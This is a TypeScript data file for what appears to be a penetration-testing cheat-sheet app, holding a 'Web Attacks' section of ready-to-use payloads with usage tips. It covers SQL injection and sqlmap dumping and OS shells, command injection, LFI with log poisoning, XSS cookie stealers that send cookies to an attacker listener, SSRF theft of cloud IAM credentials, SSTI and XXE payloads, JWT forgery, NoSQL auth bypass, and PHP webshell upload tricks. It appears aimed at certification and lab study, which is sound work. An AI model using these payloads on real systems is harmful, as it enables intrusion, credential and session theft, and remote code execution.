import { Section } from "./types";

export const webSection: Section = {
  id: "web",
  title: "Web Attacks",
  slug: "web",
  groups: [
    {
      title: "SQL Injection Manual",
      subtitle: "Use when you see URL params or form fields reflecting input — test error-based first, then UNION, then blind.",
      commands: [
        { id: "web-1", cmd: "' OR 1=1-- -", description: "First probe for any login form — if it bypasses auth, the backend is vulnerable to SQLi.", tip: "Try variations: ' OR '1'='1, admin'-- -, ' OR 1=1#. The comment syntax varies by DB.", tags: ["web"] },
        { id: "web-2", cmd: "' UNION SELECT null,null-- -", description: "Probe UNION column count — keep adding nulls until no error. Required before data extraction.", tip: "Must match the exact number of columns in the original query.", tags: ["web"] },
        { id: "web-2a", cmd: "' ORDER BY 3-- -", description: "Alternative column count probe — increment until you get an 'unknown column' error.", tip: "Faster than UNION null probing on some databases.", tags: ["web"] },
        { id: "web-2b", cmd: "' UNION SELECT database(),user(),@@version-- -", description: "Once column count is known — extract DB name, current user, and version in one query.", tags: ["web"] },
        { id: "web-2c", cmd: "' UNION SELECT table_name,null FROM information_schema.tables WHERE table_schema=database()-- -", description: "Enumerate all tables in the current database — look for users, accounts, credentials.", tags: ["web"] },
        { id: "web-2d", cmd: "' UNION SELECT column_name,null FROM information_schema.columns WHERE table_name='users'-- -", description: "Enumerate columns in target table before extracting data.", tags: ["web"] },
        { id: "web-2e", cmd: "' AND SLEEP(5)-- -", description: "MySQL blind time-based probe — if response delays 5 seconds, SQLi is confirmed without visible output.", tip: "Use for blind SQLi when no error or content difference is visible.", tags: ["web"] },
        { id: "web-2f", cmd: "'; WAITFOR DELAY '0:0:5'-- -", description: "MSSQL blind time-based probe — confirms SQLi on SQL Server when there's no visible output.", tags: ["web"] },
        { id: "web-2g", cmd: "' AND 1=CONVERT(int,(SELECT TOP 1 table_name FROM information_schema.tables))-- -", description: "MSSQL error-based extraction — forces a type conversion error that leaks table name in the message.", tags: ["web"] },
        { id: "web-2h", cmd: "' UNION SELECT LOAD_FILE('/etc/passwd'),null-- -", description: "MySQL file read — use when you have FILE privilege and UNION injection. Reads server-side files.", tip: "Requires secure_file_priv to be empty. Check with: SHOW VARIABLES LIKE 'secure_file_priv'", tags: ["web", "linux"] },
      ],
    },
    {
      title: "SQLMap",
      subtitle: "Automate SQLi detection and exploitation — use -r with a Burp request file for the most reliable results.",
      commands: [
        { id: "web-3", cmd: "sqlmap -u '{URL}/page.php?id=1' --batch --dbs", description: "Auto-detect SQLi and list databases — starting point when you've confirmed a vulnerable parameter.", tip: "--batch answers all prompts automatically. Use for speed during OSCP.", tags: ["web"], hasVars: true },
        { id: "web-3a", cmd: "sqlmap -u '{URL}/page.php?id=1' --batch --tables -D {DB}", description: "Enumerate tables in a specific database — run after --dbs to find the target table.", tags: ["web"], hasVars: true },
        { id: "web-3b", cmd: "sqlmap -u '{URL}/page.php?id=1' --batch --dump -D {DB} -T users", description: "Dump target table — gets usernames and password hashes for offline cracking.", tags: ["web"], hasVars: true },
        { id: "web-3c", cmd: "sqlmap -r request.txt --batch --risk=3 --level=5", description: "Use when URL parameters aren't enough — capture the full Burp request and pass it directly.", tip: "Save a Burp request to request.txt with File > Save item. Risk 3 tests stacked queries.", tags: ["web"] },
        { id: "web-3d", cmd: "sqlmap -u '{URL}/page.php?id=1' --batch --os-shell", description: "Attempt to spawn an OS shell via SQLi — requires FILE priv and writable web root.", tags: ["web"], hasVars: true },
        { id: "web-3e", cmd: "sqlmap -u '{URL}/page.php?id=1' --batch --file-read /etc/passwd", description: "Read arbitrary files from the server via SQLi — requires FILE privilege on the DB user.", tags: ["web", "linux"], hasVars: true },
        { id: "web-3f", cmd: "sqlmap -u '{URL}' --data='username=admin&password=test' --batch --dbs", description: "SQLmap on POST form data — use when the vulnerable param is in a form body, not a URL param.", tip: "Alternatively: use -r with a captured Burp request for POST targets.", tags: ["web"], hasVars: true },
      ],
    },
    {
      title: "Command Injection",
      subtitle: "Use when input is passed to OS commands — common in ping/traceroute forms, network utilities, or admin panels.",
      commands: [
        { id: "web-4", cmd: "127.0.0.1; id", description: "Semicolon injection — first probe. If response includes uid=, you have command injection.", tip: "Try all operators systematically: ; && || | \\n — some are filtered while others aren't.", tags: ["web", "linux"] },
        { id: "web-4a", cmd: "127.0.0.1 && whoami", description: "AND operator injection — only executes second command if the first succeeds.", tags: ["web"] },
        { id: "web-4b", cmd: "127.0.0.1 | whoami", description: "Pipe operator injection — output of first command is discarded, second executes.", tags: ["web"] },
        { id: "web-4c", cmd: "127.0.0.1$(id)", description: "Command substitution — useful when other operators are filtered but subshell execution isn't.", tags: ["web", "linux"] },
        { id: "web-4d", cmd: "127.0.0.1\\nwhoami", description: "Newline injection — bypasses filters that block ; && || but allow URL-encoded newlines.", tags: ["web"] },
        { id: "web-4e", cmd: "127.0.0.1 & ping -c 1 {LHOST} #", description: "Out-of-band injection verification — use when there's no visible output. Watch tcpdump for ICMP.", tip: "Run: sudo tcpdump -i tun0 icmp on attacker to catch the ping.", tags: ["web"], hasVars: true },
      ],
    },
    {
      title: "LFI / Path Traversal",
      subtitle: "Use when a page parameter loads files — try increasing traversal depth until /etc/passwd is readable.",
      commands: [
        { id: "web-5", cmd: "{URL}/index.php?page=../../../../etc/passwd", description: "Basic LFI — confirm file read by checking for root: in the response.", tip: "If blocked, try more traversal levels (../../../..) or encodings below.", tags: ["web"], hasVars: true },
        { id: "web-5a", cmd: "{URL}/index.php?page=php://filter/convert.base64-encode/resource=index.php", description: "Read PHP source code via php:// wrapper — base64 decode the response to see the code.", tip: "Use to find hardcoded DB credentials, API keys, or other include paths in the app.", tags: ["web"], hasVars: true },
        { id: "web-5b", cmd: "{URL}/index.php?page=../../../../proc/self/environ", description: "Environ file inclusion — may contain HTTP headers. Inject PHP in User-Agent for log poisoning.", tags: ["web"], hasVars: true },
        { id: "web-5c", cmd: "{URL}/index.php?page=../../../../var/log/apache2/access.log", description: "Apache log poisoning — inject PHP payload in User-Agent header, then include the log file to execute.", tip: "Set User-Agent: <?php system($_GET['cmd']); ?> in Burp then include this log path.", tags: ["web"], hasVars: true },
        { id: "web-5d", cmd: "{URL}/index.php?page=..%2F..%2F..%2Fetc%2Fpasswd", description: "URL-encoded traversal bypass — use when the app decodes URLs but filters raw ../ sequences.", tags: ["web"], hasVars: true },
        { id: "web-5e", cmd: "{URL}/index.php?page=....//....//....//etc//passwd", description: "Double-slash traversal — use when app strips ../ but doesn't strip the double-dot sequence.", tags: ["web"], hasVars: true },
        { id: "web-5f", cmd: "{URL}/index.php?page=php://input", description: "php://input wrapper — POST arbitrary PHP code directly. Only works if allow_url_include is On.", tip: "POST body: <?php system('id'); ?> with Content-Type: application/x-www-form-urlencoded", tags: ["web"], hasVars: true },
        { id: "web-5g", cmd: "{URL}/download?file=../../../../../../etc/shadow", description: "LFI in download/export endpoints — often less filtered than page/include parameters.", tags: ["web"], hasVars: true },
      ],
    },
    {
      title: "XSS",
      subtitle: "Use to steal session cookies, test for reflected/stored output, or escalate to account takeover.",
      commands: [
        { id: "web-6", cmd: "<script>alert(document.domain)</script>", description: "Classic reflected XSS probe — confirms domain context. Replace with cookie stealer when confirmed.", tags: ["web"] },
        { id: "web-6a", cmd: "\"><svg/onload=alert(1)>", description: "Attribute context breakout — use when input is reflected inside an HTML attribute value.", tip: "Try variations: \" onmouseover=alert(1), ' onload=alert(1) depending on quote type.", tags: ["web"] },
        { id: "web-6b", cmd: "<img src=x onerror=fetch('http://{LHOST}/?c='+document.cookie)>", description: "Cookie stealer via fetch — exfiltrates session cookie to your listener.", tip: "Start: nc -lvnp 80 or python3 -m http.server 80 on attacker to receive the cookie.", tags: ["web"], hasVars: true },
        { id: "web-6c", cmd: "javascript:alert(1)", description: "JavaScript URI — use when input is placed in href or src attributes and anchor tags are rendered.", tags: ["web"] },
        { id: "web-6d", cmd: "<script>new Image().src='http://{LHOST}/steal?c='+encodeURIComponent(document.cookie)</script>", description: "Cookie stealer via Image() — bypasses some CSP policies that block fetch().", tags: ["web"], hasVars: true },
      ],
    },
    {
      title: "SSRF",
      subtitle: "Use when the app fetches external URLs — probe for internal services, cloud metadata, or file:// access.",
      commands: [
        { id: "web-7", cmd: "curl -s '{URL}/fetch?url=http://127.0.0.1:80'", description: "SSRF localhost probe — confirms server-side request. Vary the port to find internal services.", tip: "Try ports: 80, 443, 8080, 8443, 3000, 5000, 9200, 6379, 27017 for common services.", tags: ["web"], hasVars: true },
        { id: "web-7a", cmd: "curl -s '{URL}/fetch?url=http://169.254.169.254/latest/meta-data/'", description: "AWS IMDSv1 metadata endpoint — lists available metadata keys from cloud instance.", tip: "Navigate to: /latest/meta-data/iam/security-credentials/ to get IAM role credentials.", tags: ["web"], hasVars: true },
        { id: "web-7b", cmd: "curl -s '{URL}/fetch?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/'", description: "AWS IAM credential SSRF — returns role name. Then append the role name to get the actual keys.", tags: ["web"], hasVars: true },
        { id: "web-7c", cmd: "ffuf -w /usr/share/seclists/Fuzzing/SSRF/SSRF-testing-list.txt -u '{URL}/fetch?url=FUZZ'", description: "Use when SSRF is detected but the URL is filtered — fuzz common bypass formats.", tip: "Common bypasses: http://127.1, http://[::1], http://0.0.0.0, http://2130706433", tags: ["web"], hasVars: true },
        { id: "web-7d", cmd: "curl -s '{URL}/fetch?url=file:///etc/passwd'", description: "SSRF with file:// scheme — reads local files if the server doesn't filter scheme types.", tags: ["web"], hasVars: true },
      ],
    },
    {
      title: "SSTI",
      subtitle: "Use when input is reflected in rendered templates — probe with math expressions and escalate to RCE.",
      commands: [
        { id: "web-8", cmd: "{{7*7}}", description: "Jinja2/Twig SSTI probe — if you see 49 in the response, template injection is confirmed.", tip: "Detection: {{7*7}} → 49 (Jinja2/Twig). ${7*7} → 49 (Freemarker/EL). #{7*7} → 49 (Pebble)", tags: ["web"] },
        { id: "web-8a", cmd: "${7*7}", description: "EL/Freemarker SSTI probe — confirms Java-based template engine injection.", tags: ["web"] },
        { id: "web-8b", cmd: "{{config.items()}}", description: "Flask/Jinja2 config disclosure — dumps app configuration including SECRET_KEY.", tags: ["web"] },
        { id: "web-8c", cmd: "{{self.__init__.__globals__.__builtins__.__import__('os').popen('id').read()}}", description: "Jinja2 RCE payload — escalate from SSTI detection to OS command execution.", tip: "Replace 'id' with your reverse shell or command. URL-encode if sending via GET.", tags: ["web"] },
        { id: "web-8d", cmd: "<#assign ex=\"freemarker.template.utility.Execute\"?new()>${ex(\"id\")}", description: "Freemarker SSTI RCE — use when the template engine is Freemarker (Java).", tags: ["web"] },
        { id: "web-8e", cmd: "#{7*7}", description: "Pebble/Smarty SSTI probe — test when above probes are rejected to identify different template engines.", tags: ["web"] },
      ],
    },
    {
      title: "XXE",
      subtitle: "Use when the app accepts XML input — look for file upload, SOAP APIs, or requests with XML bodies.",
      commands: [
        { id: "web-9", cmd: "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"file:///etc/passwd\">]><root>&xxe;</root>", description: "Classic XXE file read — inject into any XML body. Confirms XXE if /etc/passwd content is returned.", tip: "Change file:///etc/passwd to any path. Also try: file:///etc/hosts, file:///etc/shadow", tags: ["web", "linux"] },
        { id: "web-9a", cmd: "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"php://filter/convert.base64-encode/resource=index.php\">]><root>&xxe;</root>", description: "XXE + PHP filter — read PHP source code. Useful for finding other vulns or credentials.", tags: ["web"] },
        { id: "web-9b", cmd: "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://{LHOST}/evil.dtd\"> %xxe;]><root/>", description: "Out-of-band XXE — use when the app doesn't reflect output (blind XXE). External DTD exfiltrates data.", tip: "Host evil.dtd with: <!ENTITY % data SYSTEM \"file:///etc/passwd\"> and a callback entity.", tags: ["web"], hasVars: true },
        { id: "web-9c", cmd: "python3 -m http.server 80", description: "Host the external DTD file for OOB XXE — attacker machine must be reachable from the target server.", tags: ["web", "all"] },
      ],
    },
    {
      title: "JWT Attacks",
      subtitle: "Use when authentication uses JWT tokens — intercept in Burp, then test alg:none, key confusion, or brute force.",
      commands: [
        { id: "web-10", cmd: "jwt-tool {HASH} -S hs256 -d /usr/share/wordlists/rockyou.txt", description: "Brute-force the HS256 secret key — if found, forge arbitrary JWTs with any claims.", tip: "Weak secrets like 'secret', 'password', '12345' are common. Try them first manually.", tags: ["web"], hasVars: true },
        { id: "web-10a", cmd: "jwt-tool {HASH} -X a", description: "alg:none attack — sets algorithm to none, removing signature validation. Works on unpatched libraries.", tip: "If accepted, forge a token with admin:true or elevated role claims.", tags: ["web"], hasVars: true },
        { id: "web-10b", cmd: "jwt-tool {HASH} -X k", description: "RS256 to HS256 key confusion — use the server's public key as the HS256 secret to forge tokens.", tags: ["web"], hasVars: true },
        { id: "web-10c", cmd: "python3 -c \"import base64,json;h,p,s='{HASH}'.split('.');print(json.loads(base64.b64decode(p+'==').decode()))\"", description: "Decode JWT payload without tools — quickly read claims before deciding which attack to try.", tags: ["web"], hasVars: true },
      ],
    },
    {
      title: "NoSQL Injection",
      subtitle: "Use when the app uses MongoDB or other NoSQL — try $ne operator bypasses on login forms.",
      commands: [
        { id: "web-11", cmd: "{\"username\":{\"$ne\":null},\"password\":{\"$ne\":null}}", description: "MongoDB auth bypass — sends JSON with $ne operator so any username/password that isn't null matches.", tip: "Send as JSON body with Content-Type: application/json and POST method.", tags: ["web"] },
        { id: "web-11a", cmd: "admin' || '1'=='1", description: "String-based NoSQL bypass — use in form fields that feed into a string comparison query.", tags: ["web"] },
        { id: "web-11b", cmd: "{\"$where\":\"sleep(5000)\"}", description: "MongoDB blind time-based injection — confirms injection if response delays 5 seconds.", tip: "Use for confirmation when there's no visible error or auth bypass.", tags: ["web"] },
        { id: "web-11c", cmd: "username=admin&password[$ne]=invalid", description: "URL-encoded $ne injection — use when app reads POST body as URL-encoded params and passes to MongoDB.", tags: ["web"] },
      ],
    },
    {
      title: "File Upload Abuse",
      subtitle: "Use when the app allows file uploads — bypass extension filters and upload a webshell for RCE.",
      commands: [
        { id: "web-12", cmd: "echo '<?php system($_GET[\"cmd\"]); ?>' > shell.php", description: "Create a minimal PHP webshell — simplest form, execute commands via ?cmd= parameter.", tip: "After upload, trigger with: curl '{URL}/uploads/shell.php?cmd=id'", tags: ["web"] },
        { id: "web-12a", cmd: "cp shell.php shell.php.jpg", description: "Double extension bypass — some servers execute by first extension. Try: .php.jpg, .php5, .phtml, .phar.", tags: ["web"] },
        { id: "web-12b", cmd: "exiftool -Comment='<?php system($_GET[\"cmd\"]); ?>' image.jpg -o shell.jpg.php", description: "Inject PHP payload into image metadata — bypasses content-type checks while embedding executable code.", tags: ["web"] },
        { id: "web-12c", cmd: "printf 'GIF89a;\\n<?php system($_GET[\"cmd\"]);?>' > shell.gif.php", description: "Magic bytes bypass — prepend GIF89a header to pass MIME type checks while keeping PHP execution.", tip: "Also try with JPEG magic bytes: \\xff\\xd8\\xff", tags: ["web"] },
        { id: "web-12d", cmd: "curl -X PUT {URL}/uploads/shell.php -d '<?php system($_GET[\"cmd\"]);?>'", description: "HTTP PUT upload — use when the server has PUT method enabled on the uploads directory.", tags: ["web"], hasVars: true },
        { id: "web-12e", cmd: "curl '{URL}/uploads/shell.php?cmd=id'", description: "Execute uploaded webshell — verify code execution before proceeding to a full reverse shell.", tags: ["web"], hasVars: true },
      ],
    },
    {
      title: "Miscellaneous Web",
      subtitle: "Quick checks for CORS, host header injection, IP spoofing, and open redirects — useful in CTF-style web targets.",
      commands: [
        { id: "web-13", cmd: "curl -s -I {URL} -H 'Origin: https://evil.com'", description: "CORS misconfiguration — if response includes Access-Control-Allow-Origin: https://evil.com, credentials can be stolen cross-origin.", tags: ["web"], hasVars: true },
        { id: "web-13a", cmd: "curl -s {URL} -H 'X-Forwarded-For: 127.0.0.1'", description: "IP restriction bypass — use when access control is based on client IP and trusts X-Forwarded-For header.", tags: ["web"], hasVars: true },
        { id: "web-13b", cmd: "curl -s '{URL}' -H 'Host: internal.company.com'", description: "Host header injection — can trigger password reset poisoning or access internal virtual hosts.", tip: "Combine with password reset: inject your domain in Host to receive reset link at your server.", tags: ["web"], hasVars: true },
        { id: "web-13c", cmd: "curl -s -X TRACE {URL}", description: "HTTP TRACE method — reveals what headers the server echoes back, useful for XST or debugging WAF behavior.", tags: ["web"], hasVars: true },
        { id: "web-13d", cmd: "curl -s '{URL}/secret?redirect=http://evil.com'", description: "Open redirect — can be chained with OAuth flows or phishing. Confirm by checking Location header.", tags: ["web"], hasVars: true },
      ],
    },
  ],
};
